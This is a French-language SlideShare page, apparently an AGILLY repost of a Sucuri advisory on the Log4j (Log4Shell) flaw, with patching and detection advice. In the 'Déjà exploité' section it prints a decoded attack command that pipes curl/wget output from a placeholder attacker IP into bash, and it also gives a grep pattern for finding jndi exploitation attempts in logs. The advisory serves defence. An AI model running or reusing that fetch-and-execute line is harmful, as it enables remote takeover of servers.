SlideShare une entreprise Scribd logo
1  sur  4
Télécharger pour lire hors ligne
Vulnérabilité Log4j : Le cadeau de
vacances parfait dont personne ne veut
Une vulnérabilité critique de sécurité de serveur dans la bibliothèque de
journalisation Java Log4j prend d'assaut Internet, car le code permettant
d'exploiter activement cette vulnérabilité est déjà largement distribué sur le
Web. Initialement trouvé sur le jeu populaire Minecraft, il a depuis été démontré
qu'il affectait la plupart des serveurs Web exécutant Apache ainsi que sa
bibliothèque de journalisation omniprésente Log4j. Il a été activement exploité
par les acteurs de la menace sur le Web. Il s'agit de loin de la vulnérabilité la
plus grave de 2021, avec un score de 10/10 sur l'échelle CVSS. La vulnérabilité
affecte les versions 2.14.1 et inférieures. Il permet l'exécution de code arbitraire
à distance et potentiellement la prise de contrôle complète des serveurs et des
ordinateurs par les attaquants.
Mon site Web est-il sûr ?
Les règles de protection génériques de notre pare-feu d'application
Web protégeaient contre la plupart de ces tentatives d'exploitation, cependant
nous avons rapidement poussé un correctif pour couvrir la nouvelle gamme de
variantes découvertes. Les sites Web derrière notre pare-feu sont protégés
contre cette attaque. Si vous exploitez un serveur tel qu'un VPS (serveur privé
virtuel) et utilisez Apache Log4j, vous devez prendre des mesures pour corriger
immédiatement votre environnement et vous assurer que vous utilisez la version
corrigée 2.15.0.
Cela étant dit, la quantité d'applications logicielles qui utilisent Log4j
est vaste et ne s'applique pas uniquement aux sites Web. Même certains routeurs
et autres périphériques matériels utilisent des logiciels qui utilisent Log4j. Par
conséquent, qualifier cette attaque d'« immense » ne suffit pas à décrire l'étendue
de cette vulnérabilité. On peut supposer sans risque que de nombreuses
organisations, grandes et petites, ont déjà été compromises. La gravité de celui-
ci est facilement comparable à d'autres défaillances de sécurité catastrophiques
telles que Shellshock, Heartbleed et EternalBlue.
Flashbacks de ShellShock
Les adeptes de longue date de la sécurité Web se souviendront de la
vulnérabilité de rupture d'Internet ShellShock de 2014. Fait intéressant, cette
vulnérabilité fonctionne de la même manière en ce sens que les serveurs Web
vulnérables peuvent être compromis par la simple utilisation d'une modification
d’un ensemble d’agent utilisateur (user agent string).
Étant donné que la vulnérabilité se trouve dans la bibliothèque de journalisation
Apache, la chaîne de l'agent utilisateur (user agent string) de la requête est suffisante
pour exécuter une infection. Les attaquants n'ont qu'à utiliser jndi:ldap suivi de leur
charge utile. Apache enregistrera la demande et exécutera la commande arbitraire
résidant sur le serveur LDAP contrôlé par l’attaquant.
Déjà exploité à l'état sauvage
Les attaquants ont immédiatement commencé à exploiter cette
vulnérabilité. Nous avons déjà vu de nombreuses attaques différentes ciblant ce
logiciel, par exemple cette requête encodée en base64 vers des serveurs Apache
potentiellement vulnérables :
Décryptons cette chaîne et examinons ce que fait cette attaque :
(curl -s ATTAQUANT-IP :5874/ VICTIME-IP :80||wget -q -O- ATTAQUANT-IP :5874/
VICTIME-IP :80)|bash
Il s'agit d'une simple commande curl qui utilise wget pour télécharger
subrepticement du contenu malveillant du serveur contrôlé par l'attaquant sur le
serveur victime. Tout le monde peut deviner quel est exactement le contenu, car
il est contrôlé par les attaquants et peut être changé/modifié à volonté. On ne
peut que supposer qu'ils utiliseraient cet exploit pour prendre le contrôle de
serveurs Web vulnérables afin de propager des logiciels malveillants et
potentiellement compromettre des serveurs entiers.
Ai-je été attaqué ?
Si vous avez accès aux logs Apache de votre serveur, vous pouvez exécuter la
commande suivante pour vérifier si votre serveur a été ciblé :
egrep -I -i -r '$({|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^n]+' / var/log
Cela montrera toutes les tentatives d'exploitation de cette vulnérabilité sur votre
serveur, du moins avec les attaques connues à ce jour. Compte tenu de la gravité
de cette vulnérabilité, de nombreuses nouvelles variantes évoluent au fur et à
mesure que je tape cet article.
En conclusion
Si vous êtes propriétaire d'un site Web ou exploitez un VPS ou un autre serveur,
assurez-vous de mettre à jour tout logiciel que vous utilisez qui utilise log4j vers
la version corrigée la plus récente. Vous pouvez également interroger votre
système de fichiers pour les fichiers modifiés récemment, ou éventuellement
restaurer votre serveur à un instant sécurisé avant qu'une éventuelle
compromission ne se produise, puis mettre à jour le logiciel vulnérable
immédiatement.
Si vous vous demandez si un logiciel que vous utilisez sur votre serveur ou votre
réseau domestique/de travail peut être en danger, veuillez consulter cette liste
pratique conservée par Nationaal Cyber Security Centrum des Pays-Bas.
Si vous utilisez un VPS, il serait également conseillé d’utiliser un système de
détection d'intrusion tel que OSSECHIDS sur votre serveur. Cela aidera à garder
une trace des modifications des fichiers système et d'autres indicateurs potentiels
de compromission sur le serveur lui-même (plutôt que sur votre site Web
uniquement).
Pour éviter que votre site Web ne soit un vecteur pour cet exploit de serveur,
vous pouvez également placer votre site Web derrière notre pare - feu et nous le
protégerons de cette attaque et de bien d'autres.
MISE À JOUR : Depuis la rédaction de cet article, un autre correctif a
été publié Log4j 2.16.0 afin de résoudre les problèmes potentiels de déni de
service avec le correctif 2.15.0. Le correctif 2.16.0 désactive entièrement la
fonctionnalité JNDI par défaut et supprime les recherches de messages.

Contenu connexe

Tendances

Introduction to malware analysis with Cuckoo Sandbox
Introduction to malware analysis with Cuckoo SandboxIntroduction to malware analysis with Cuckoo Sandbox
Introduction to malware analysis with Cuckoo Sandboxsysinsider
 
FAN, Fully Automated Nagios, Rencontres Mondiales du Logiciel Libre 2008
FAN, Fully Automated Nagios, Rencontres Mondiales du Logiciel Libre 2008FAN, Fully Automated Nagios, Rencontres Mondiales du Logiciel Libre 2008
FAN, Fully Automated Nagios, Rencontres Mondiales du Logiciel Libre 2008FAN Fully Automated Nagios
 
Un écosystème collaboratif open source et zerotrust dans le cloud public, est...
Un écosystème collaboratif open source et zerotrust dans le cloud public, est...Un écosystème collaboratif open source et zerotrust dans le cloud public, est...
Un écosystème collaboratif open source et zerotrust dans le cloud public, est...Open Source Experience
 
OpenShift en production - Akram Ben Assi & Eloïse Faure
OpenShift en production - Akram Ben Assi & Eloïse FaureOpenShift en production - Akram Ben Assi & Eloïse Faure
OpenShift en production - Akram Ben Assi & Eloïse FaureParis Container Day
 
Présentation de nagios
Présentation de nagiosPrésentation de nagios
Présentation de nagiosilyassin
 
memoire utilisation de Puppet et Nagios
memoire utilisation de Puppet et Nagiosmemoire utilisation de Puppet et Nagios
memoire utilisation de Puppet et Nagiosabouaalexis
 
Introduction à docker - Meetup WP Rennes
Introduction à docker - Meetup WP RennesIntroduction à docker - Meetup WP Rennes
Introduction à docker - Meetup WP RennesYann Nave
 
Windows Server vNext- virtualisation et stockage
Windows Server vNext- virtualisation et stockageWindows Server vNext- virtualisation et stockage
Windows Server vNext- virtualisation et stockageMicrosoft Décideurs IT
 
Analyser la sécurité de son code source avec SonarSource
Analyser la sécurité de son code source avec SonarSourceAnalyser la sécurité de son code source avec SonarSource
Analyser la sécurité de son code source avec SonarSourceSébastien GIORIA
 

Tendances (14)

Introduction to malware analysis with Cuckoo Sandbox
Introduction to malware analysis with Cuckoo SandboxIntroduction to malware analysis with Cuckoo Sandbox
Introduction to malware analysis with Cuckoo Sandbox
 
FAN, Fully Automated Nagios, Rencontres Mondiales du Logiciel Libre 2008
FAN, Fully Automated Nagios, Rencontres Mondiales du Logiciel Libre 2008FAN, Fully Automated Nagios, Rencontres Mondiales du Logiciel Libre 2008
FAN, Fully Automated Nagios, Rencontres Mondiales du Logiciel Libre 2008
 
Nagios 3
Nagios 3Nagios 3
Nagios 3
 
Les tests de securite devops
Les tests de securite devopsLes tests de securite devops
Les tests de securite devops
 
Let's encrypt
Let's encryptLet's encrypt
Let's encrypt
 
Supervision
SupervisionSupervision
Supervision
 
Un écosystème collaboratif open source et zerotrust dans le cloud public, est...
Un écosystème collaboratif open source et zerotrust dans le cloud public, est...Un écosystème collaboratif open source et zerotrust dans le cloud public, est...
Un écosystème collaboratif open source et zerotrust dans le cloud public, est...
 
Comprendre la securite web
Comprendre la securite webComprendre la securite web
Comprendre la securite web
 
OpenShift en production - Akram Ben Assi & Eloïse Faure
OpenShift en production - Akram Ben Assi & Eloïse FaureOpenShift en production - Akram Ben Assi & Eloïse Faure
OpenShift en production - Akram Ben Assi & Eloïse Faure
 
Présentation de nagios
Présentation de nagiosPrésentation de nagios
Présentation de nagios
 
memoire utilisation de Puppet et Nagios
memoire utilisation de Puppet et Nagiosmemoire utilisation de Puppet et Nagios
memoire utilisation de Puppet et Nagios
 
Introduction à docker - Meetup WP Rennes
Introduction à docker - Meetup WP RennesIntroduction à docker - Meetup WP Rennes
Introduction à docker - Meetup WP Rennes
 
Windows Server vNext- virtualisation et stockage
Windows Server vNext- virtualisation et stockageWindows Server vNext- virtualisation et stockage
Windows Server vNext- virtualisation et stockage
 
Analyser la sécurité de son code source avec SonarSource
Analyser la sécurité de son code source avec SonarSourceAnalyser la sécurité de son code source avec SonarSource
Analyser la sécurité de son code source avec SonarSource
 

Similaire à Agilly vulnérabilité log4j-sucuri

Prévention et traitement du hack de serveurs
Prévention et traitement du hack de serveursPrévention et traitement du hack de serveurs
Prévention et traitement du hack de serveursAmen.fr
 
Installation Et Configuration De Monkey Spider
Installation Et Configuration De Monkey SpiderInstallation Et Configuration De Monkey Spider
Installation Et Configuration De Monkey SpiderMohamed Ben Bouzid
 
Installation et configuration d'openbravo
Installation et configuration d'openbravoInstallation et configuration d'openbravo
Installation et configuration d'openbravoSoumia Brabije
 
20090929 04 - Securité applicative, hacking et risque applicatif
20090929 04 - Securité applicative, hacking et risque applicatif20090929 04 - Securité applicative, hacking et risque applicatif
20090929 04 - Securité applicative, hacking et risque applicatifLeClubQualiteLogicielle
 
Configuration des services web sous centOS 5
Configuration des services web sous centOS 5Configuration des services web sous centOS 5
Configuration des services web sous centOS 5Sarah
 
Mise en place de zabbix sur Ubuntu 22.04
Mise en place de zabbix sur Ubuntu 22.04Mise en place de zabbix sur Ubuntu 22.04
Mise en place de zabbix sur Ubuntu 22.04ImnaTech
 
Mdl ocsinventory 20100330
Mdl ocsinventory 20100330Mdl ocsinventory 20100330
Mdl ocsinventory 20100330robertpluss
 
Qualité Logiciel - Outils Open Source pour Java et Web
Qualité Logiciel - Outils Open Source pour Java et WebQualité Logiciel - Outils Open Source pour Java et Web
Qualité Logiciel - Outils Open Source pour Java et WebChristophe Rochefolle
 
Mdl ocsinventory 20100330-2
Mdl ocsinventory 20100330-2Mdl ocsinventory 20100330-2
Mdl ocsinventory 20100330-2tikok974
 
Mdl ocsinventory 20100330-2
Mdl ocsinventory 20100330-2Mdl ocsinventory 20100330-2
Mdl ocsinventory 20100330-2tikok974
 
La sécurité des applications avec ESAPI
La sécurité des applications avec ESAPILa sécurité des applications avec ESAPI
La sécurité des applications avec ESAPITakfarinas KENOUCHE
 
Bonnes pratiques pour sécuriser un serveur Linux
Bonnes pratiques pour sécuriser un serveur LinuxBonnes pratiques pour sécuriser un serveur Linux
Bonnes pratiques pour sécuriser un serveur LinuxKiwi Backup
 
Premiers pas avec snort
Premiers pas avec snortPremiers pas avec snort
Premiers pas avec snortFathi Ben Nasr
 
Atelier hadoop-single-sign-on
Atelier hadoop-single-sign-onAtelier hadoop-single-sign-on
Atelier hadoop-single-sign-onsahar dridi
 
Java uik-chap1-intro java
Java uik-chap1-intro javaJava uik-chap1-intro java
Java uik-chap1-intro javaAmel Morchdi
 
unité 2.pptx
unité 2.pptxunité 2.pptx
unité 2.pptxBahaty1
 
Rapport d'installation de Linux Engine X MariaDB PHP5
Rapport d'installation de Linux Engine X MariaDB PHP5Rapport d'installation de Linux Engine X MariaDB PHP5
Rapport d'installation de Linux Engine X MariaDB PHP5Mame Cheikh Ibra Niang
 

Similaire à Agilly vulnérabilité log4j-sucuri (20)

Prévention et traitement du hack de serveurs
Prévention et traitement du hack de serveursPrévention et traitement du hack de serveurs
Prévention et traitement du hack de serveurs
 
Installation Et Configuration De Monkey Spider
Installation Et Configuration De Monkey SpiderInstallation Et Configuration De Monkey Spider
Installation Et Configuration De Monkey Spider
 
rapportWAS
rapportWASrapportWAS
rapportWAS
 
Installation et configuration d'openbravo
Installation et configuration d'openbravoInstallation et configuration d'openbravo
Installation et configuration d'openbravo
 
20090929 04 - Securité applicative, hacking et risque applicatif
20090929 04 - Securité applicative, hacking et risque applicatif20090929 04 - Securité applicative, hacking et risque applicatif
20090929 04 - Securité applicative, hacking et risque applicatif
 
Configuration des services web sous centOS 5
Configuration des services web sous centOS 5Configuration des services web sous centOS 5
Configuration des services web sous centOS 5
 
Mise en place de zabbix sur Ubuntu 22.04
Mise en place de zabbix sur Ubuntu 22.04Mise en place de zabbix sur Ubuntu 22.04
Mise en place de zabbix sur Ubuntu 22.04
 
Mdl ocsinventory 20100330
Mdl ocsinventory 20100330Mdl ocsinventory 20100330
Mdl ocsinventory 20100330
 
Qualité Logiciel - Outils Open Source pour Java et Web
Qualité Logiciel - Outils Open Source pour Java et WebQualité Logiciel - Outils Open Source pour Java et Web
Qualité Logiciel - Outils Open Source pour Java et Web
 
Mdl ocsinventory 20100330-2
Mdl ocsinventory 20100330-2Mdl ocsinventory 20100330-2
Mdl ocsinventory 20100330-2
 
Mdl ocsinventory 20100330-2
Mdl ocsinventory 20100330-2Mdl ocsinventory 20100330-2
Mdl ocsinventory 20100330-2
 
Mysql
MysqlMysql
Mysql
 
La sécurité des applications avec ESAPI
La sécurité des applications avec ESAPILa sécurité des applications avec ESAPI
La sécurité des applications avec ESAPI
 
Bonnes pratiques pour sécuriser un serveur Linux
Bonnes pratiques pour sécuriser un serveur LinuxBonnes pratiques pour sécuriser un serveur Linux
Bonnes pratiques pour sécuriser un serveur Linux
 
Premiers pas avec snort
Premiers pas avec snortPremiers pas avec snort
Premiers pas avec snort
 
Atelier hadoop-single-sign-on
Atelier hadoop-single-sign-onAtelier hadoop-single-sign-on
Atelier hadoop-single-sign-on
 
Java uik-chap1-intro java
Java uik-chap1-intro javaJava uik-chap1-intro java
Java uik-chap1-intro java
 
unité 2.pptx
unité 2.pptxunité 2.pptx
unité 2.pptx
 
Virusdoc
VirusdocVirusdoc
Virusdoc
 
Rapport d'installation de Linux Engine X MariaDB PHP5
Rapport d'installation de Linux Engine X MariaDB PHP5Rapport d'installation de Linux Engine X MariaDB PHP5
Rapport d'installation de Linux Engine X MariaDB PHP5
 

Plus de AGILLY

RAPPORT Magic Quadrant 2022 de Gartner pour la gestion des accès à privilè...
RAPPORT Magic Quadrant 2022 de Gartner pour la gestion des accès à privilè...RAPPORT Magic Quadrant 2022 de Gartner pour la gestion des accès à privilè...
RAPPORT Magic Quadrant 2022 de Gartner pour la gestion des accès à privilè...AGILLY
 
AGILLY-CISO-Guide de prévention des ransonwares.fr (1).pdf
AGILLY-CISO-Guide de prévention des ransonwares.fr (1).pdfAGILLY-CISO-Guide de prévention des ransonwares.fr (1).pdf
AGILLY-CISO-Guide de prévention des ransonwares.fr (1).pdfAGILLY
 
Group-IB_AGILLY-secteur financier_VS_Fraud_E-booklet_2022.en.fr .pdf
Group-IB_AGILLY-secteur financier_VS_Fraud_E-booklet_2022.en.fr .pdfGroup-IB_AGILLY-secteur financier_VS_Fraud_E-booklet_2022.en.fr .pdf
Group-IB_AGILLY-secteur financier_VS_Fraud_E-booklet_2022.en.fr .pdfAGILLY
 
AGILLY-sécurisez vos emails, qui le fait le mieux ?(1).pdf
AGILLY-sécurisez vos emails, qui le fait le mieux ?(1).pdfAGILLY-sécurisez vos emails, qui le fait le mieux ?(1).pdf
AGILLY-sécurisez vos emails, qui le fait le mieux ?(1).pdfAGILLY
 
AGILLY Présentation services MSP - Cloud & Security Workshop - 28 09 2022 v2...
AGILLY Présentation services MSP - Cloud & Security Workshop - 28 09 2022 v2...AGILLY Présentation services MSP - Cloud & Security Workshop - 28 09 2022 v2...
AGILLY Présentation services MSP - Cloud & Security Workshop - 28 09 2022 v2...AGILLY
 
5 façons de transformer la connectivité cloud
5 façons de transformer la connectivité cloud5 façons de transformer la connectivité cloud
5 façons de transformer la connectivité cloudAGILLY
 
Ds sandblast-mobile fr
Ds sandblast-mobile frDs sandblast-mobile fr
Ds sandblast-mobile frAGILLY
 
Sandblast agent-solution-brief fr
Sandblast agent-solution-brief frSandblast agent-solution-brief fr
Sandblast agent-solution-brief frAGILLY
 
Sand Blast Agent Anti Ransomware Presentation
Sand Blast Agent Anti Ransomware PresentationSand Blast Agent Anti Ransomware Presentation
Sand Blast Agent Anti Ransomware PresentationAGILLY
 
Sécurité Mobile : Votre Entreprise est-elle préparée pour 2020?
Sécurité Mobile : Votre Entreprise est-elle préparée pour 2020?Sécurité Mobile : Votre Entreprise est-elle préparée pour 2020?
Sécurité Mobile : Votre Entreprise est-elle préparée pour 2020?AGILLY
 
12 Prédictions Majeures sur la Cyber Sécurité en 2017
12 Prédictions Majeures sur la Cyber Sécurité en 201712 Prédictions Majeures sur la Cyber Sécurité en 2017
12 Prédictions Majeures sur la Cyber Sécurité en 2017AGILLY
 
Mobility Training Series : Mobility 301 protect
Mobility Training Series  : Mobility 301 protectMobility Training Series  : Mobility 301 protect
Mobility Training Series : Mobility 301 protectAGILLY
 
Le Nouveau Défi des Applis et leur Adoption dans l'Entreprises
Le Nouveau Défi des Applis et leur Adoption dans l'EntreprisesLe Nouveau Défi des Applis et leur Adoption dans l'Entreprises
Le Nouveau Défi des Applis et leur Adoption dans l'EntreprisesAGILLY
 
Bluemix Plateforme d'Innovation Numérique
Bluemix Plateforme d'Innovation NumériqueBluemix Plateforme d'Innovation Numérique
Bluemix Plateforme d'Innovation NumériqueAGILLY
 
Malware on Smartphones and Tablets - The Inconvenient Truth
Malware on Smartphones and  Tablets  - The Inconvenient  TruthMalware on Smartphones and  Tablets  - The Inconvenient  Truth
Malware on Smartphones and Tablets - The Inconvenient TruthAGILLY
 
Bluemix Overview
Bluemix OverviewBluemix Overview
Bluemix OverviewAGILLY
 
Windows 10 A Guide to Secure Mobility in the Enterprise
Windows 10 A Guide to Secure Mobility in the EnterpriseWindows 10 A Guide to Secure Mobility in the Enterprise
Windows 10 A Guide to Secure Mobility in the EnterpriseAGILLY
 
Mobility 101 : Provision
Mobility 101 : ProvisionMobility 101 : Provision
Mobility 101 : ProvisionAGILLY
 
Mobility 201 : Productivity
Mobility 201 : ProductivityMobility 201 : Productivity
Mobility 201 : ProductivityAGILLY
 
Mobility 301 : Protect
Mobility 301 : ProtectMobility 301 : Protect
Mobility 301 : ProtectAGILLY
 

Plus de AGILLY (20)

RAPPORT Magic Quadrant 2022 de Gartner pour la gestion des accès à privilè...
RAPPORT Magic Quadrant 2022 de Gartner pour la gestion des accès à privilè...RAPPORT Magic Quadrant 2022 de Gartner pour la gestion des accès à privilè...
RAPPORT Magic Quadrant 2022 de Gartner pour la gestion des accès à privilè...
 
AGILLY-CISO-Guide de prévention des ransonwares.fr (1).pdf
AGILLY-CISO-Guide de prévention des ransonwares.fr (1).pdfAGILLY-CISO-Guide de prévention des ransonwares.fr (1).pdf
AGILLY-CISO-Guide de prévention des ransonwares.fr (1).pdf
 
Group-IB_AGILLY-secteur financier_VS_Fraud_E-booklet_2022.en.fr .pdf
Group-IB_AGILLY-secteur financier_VS_Fraud_E-booklet_2022.en.fr .pdfGroup-IB_AGILLY-secteur financier_VS_Fraud_E-booklet_2022.en.fr .pdf
Group-IB_AGILLY-secteur financier_VS_Fraud_E-booklet_2022.en.fr .pdf
 
AGILLY-sécurisez vos emails, qui le fait le mieux ?(1).pdf
AGILLY-sécurisez vos emails, qui le fait le mieux ?(1).pdfAGILLY-sécurisez vos emails, qui le fait le mieux ?(1).pdf
AGILLY-sécurisez vos emails, qui le fait le mieux ?(1).pdf
 
AGILLY Présentation services MSP - Cloud & Security Workshop - 28 09 2022 v2...
AGILLY Présentation services MSP - Cloud & Security Workshop - 28 09 2022 v2...AGILLY Présentation services MSP - Cloud & Security Workshop - 28 09 2022 v2...
AGILLY Présentation services MSP - Cloud & Security Workshop - 28 09 2022 v2...
 
5 façons de transformer la connectivité cloud
5 façons de transformer la connectivité cloud5 façons de transformer la connectivité cloud
5 façons de transformer la connectivité cloud
 
Ds sandblast-mobile fr
Ds sandblast-mobile frDs sandblast-mobile fr
Ds sandblast-mobile fr
 
Sandblast agent-solution-brief fr
Sandblast agent-solution-brief frSandblast agent-solution-brief fr
Sandblast agent-solution-brief fr
 
Sand Blast Agent Anti Ransomware Presentation
Sand Blast Agent Anti Ransomware PresentationSand Blast Agent Anti Ransomware Presentation
Sand Blast Agent Anti Ransomware Presentation
 
Sécurité Mobile : Votre Entreprise est-elle préparée pour 2020?
Sécurité Mobile : Votre Entreprise est-elle préparée pour 2020?Sécurité Mobile : Votre Entreprise est-elle préparée pour 2020?
Sécurité Mobile : Votre Entreprise est-elle préparée pour 2020?
 
12 Prédictions Majeures sur la Cyber Sécurité en 2017
12 Prédictions Majeures sur la Cyber Sécurité en 201712 Prédictions Majeures sur la Cyber Sécurité en 2017
12 Prédictions Majeures sur la Cyber Sécurité en 2017
 
Mobility Training Series : Mobility 301 protect
Mobility Training Series  : Mobility 301 protectMobility Training Series  : Mobility 301 protect
Mobility Training Series : Mobility 301 protect
 
Le Nouveau Défi des Applis et leur Adoption dans l'Entreprises
Le Nouveau Défi des Applis et leur Adoption dans l'EntreprisesLe Nouveau Défi des Applis et leur Adoption dans l'Entreprises
Le Nouveau Défi des Applis et leur Adoption dans l'Entreprises
 
Bluemix Plateforme d'Innovation Numérique
Bluemix Plateforme d'Innovation NumériqueBluemix Plateforme d'Innovation Numérique
Bluemix Plateforme d'Innovation Numérique
 
Malware on Smartphones and Tablets - The Inconvenient Truth
Malware on Smartphones and  Tablets  - The Inconvenient  TruthMalware on Smartphones and  Tablets  - The Inconvenient  Truth
Malware on Smartphones and Tablets - The Inconvenient Truth
 
Bluemix Overview
Bluemix OverviewBluemix Overview
Bluemix Overview
 
Windows 10 A Guide to Secure Mobility in the Enterprise
Windows 10 A Guide to Secure Mobility in the EnterpriseWindows 10 A Guide to Secure Mobility in the Enterprise
Windows 10 A Guide to Secure Mobility in the Enterprise
 
Mobility 101 : Provision
Mobility 101 : ProvisionMobility 101 : Provision
Mobility 101 : Provision
 
Mobility 201 : Productivity
Mobility 201 : ProductivityMobility 201 : Productivity
Mobility 201 : Productivity
 
Mobility 301 : Protect
Mobility 301 : ProtectMobility 301 : Protect
Mobility 301 : Protect
 

Agilly vulnérabilité log4j-sucuri

  • 1. Vulnérabilité Log4j : Le cadeau de vacances parfait dont personne ne veut Une vulnérabilité critique de sécurité de serveur dans la bibliothèque de journalisation Java Log4j prend d'assaut Internet, car le code permettant d'exploiter activement cette vulnérabilité est déjà largement distribué sur le Web. Initialement trouvé sur le jeu populaire Minecraft, il a depuis été démontré qu'il affectait la plupart des serveurs Web exécutant Apache ainsi que sa bibliothèque de journalisation omniprésente Log4j. Il a été activement exploité par les acteurs de la menace sur le Web. Il s'agit de loin de la vulnérabilité la plus grave de 2021, avec un score de 10/10 sur l'échelle CVSS. La vulnérabilité affecte les versions 2.14.1 et inférieures. Il permet l'exécution de code arbitraire à distance et potentiellement la prise de contrôle complète des serveurs et des ordinateurs par les attaquants. Mon site Web est-il sûr ? Les règles de protection génériques de notre pare-feu d'application Web protégeaient contre la plupart de ces tentatives d'exploitation, cependant nous avons rapidement poussé un correctif pour couvrir la nouvelle gamme de variantes découvertes. Les sites Web derrière notre pare-feu sont protégés contre cette attaque. Si vous exploitez un serveur tel qu'un VPS (serveur privé virtuel) et utilisez Apache Log4j, vous devez prendre des mesures pour corriger immédiatement votre environnement et vous assurer que vous utilisez la version corrigée 2.15.0.
  • 2. Cela étant dit, la quantité d'applications logicielles qui utilisent Log4j est vaste et ne s'applique pas uniquement aux sites Web. Même certains routeurs et autres périphériques matériels utilisent des logiciels qui utilisent Log4j. Par conséquent, qualifier cette attaque d'« immense » ne suffit pas à décrire l'étendue de cette vulnérabilité. On peut supposer sans risque que de nombreuses organisations, grandes et petites, ont déjà été compromises. La gravité de celui- ci est facilement comparable à d'autres défaillances de sécurité catastrophiques telles que Shellshock, Heartbleed et EternalBlue. Flashbacks de ShellShock Les adeptes de longue date de la sécurité Web se souviendront de la vulnérabilité de rupture d'Internet ShellShock de 2014. Fait intéressant, cette vulnérabilité fonctionne de la même manière en ce sens que les serveurs Web vulnérables peuvent être compromis par la simple utilisation d'une modification d’un ensemble d’agent utilisateur (user agent string). Étant donné que la vulnérabilité se trouve dans la bibliothèque de journalisation Apache, la chaîne de l'agent utilisateur (user agent string) de la requête est suffisante pour exécuter une infection. Les attaquants n'ont qu'à utiliser jndi:ldap suivi de leur charge utile. Apache enregistrera la demande et exécutera la commande arbitraire résidant sur le serveur LDAP contrôlé par l’attaquant. Déjà exploité à l'état sauvage Les attaquants ont immédiatement commencé à exploiter cette vulnérabilité. Nous avons déjà vu de nombreuses attaques différentes ciblant ce logiciel, par exemple cette requête encodée en base64 vers des serveurs Apache potentiellement vulnérables : Décryptons cette chaîne et examinons ce que fait cette attaque :
  • 3. (curl -s ATTAQUANT-IP :5874/ VICTIME-IP :80||wget -q -O- ATTAQUANT-IP :5874/ VICTIME-IP :80)|bash Il s'agit d'une simple commande curl qui utilise wget pour télécharger subrepticement du contenu malveillant du serveur contrôlé par l'attaquant sur le serveur victime. Tout le monde peut deviner quel est exactement le contenu, car il est contrôlé par les attaquants et peut être changé/modifié à volonté. On ne peut que supposer qu'ils utiliseraient cet exploit pour prendre le contrôle de serveurs Web vulnérables afin de propager des logiciels malveillants et potentiellement compromettre des serveurs entiers. Ai-je été attaqué ? Si vous avez accès aux logs Apache de votre serveur, vous pouvez exécuter la commande suivante pour vérifier si votre serveur a été ciblé : egrep -I -i -r '$({|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^n]+' / var/log Cela montrera toutes les tentatives d'exploitation de cette vulnérabilité sur votre serveur, du moins avec les attaques connues à ce jour. Compte tenu de la gravité de cette vulnérabilité, de nombreuses nouvelles variantes évoluent au fur et à mesure que je tape cet article. En conclusion Si vous êtes propriétaire d'un site Web ou exploitez un VPS ou un autre serveur, assurez-vous de mettre à jour tout logiciel que vous utilisez qui utilise log4j vers la version corrigée la plus récente. Vous pouvez également interroger votre système de fichiers pour les fichiers modifiés récemment, ou éventuellement restaurer votre serveur à un instant sécurisé avant qu'une éventuelle compromission ne se produise, puis mettre à jour le logiciel vulnérable immédiatement. Si vous vous demandez si un logiciel que vous utilisez sur votre serveur ou votre réseau domestique/de travail peut être en danger, veuillez consulter cette liste pratique conservée par Nationaal Cyber Security Centrum des Pays-Bas.
  • 4. Si vous utilisez un VPS, il serait également conseillé d’utiliser un système de détection d'intrusion tel que OSSECHIDS sur votre serveur. Cela aidera à garder une trace des modifications des fichiers système et d'autres indicateurs potentiels de compromission sur le serveur lui-même (plutôt que sur votre site Web uniquement). Pour éviter que votre site Web ne soit un vecteur pour cet exploit de serveur, vous pouvez également placer votre site Web derrière notre pare - feu et nous le protégerons de cette attaque et de bien d'autres. MISE À JOUR : Depuis la rédaction de cet article, un autre correctif a été publié Log4j 2.16.0 afin de résoudre les problèmes potentiels de déni de service avec le correctif 2.15.0. Le correctif 2.16.0 désactive entièrement la fonctionnalité JNDI par défaut et supprime les recherches de messages.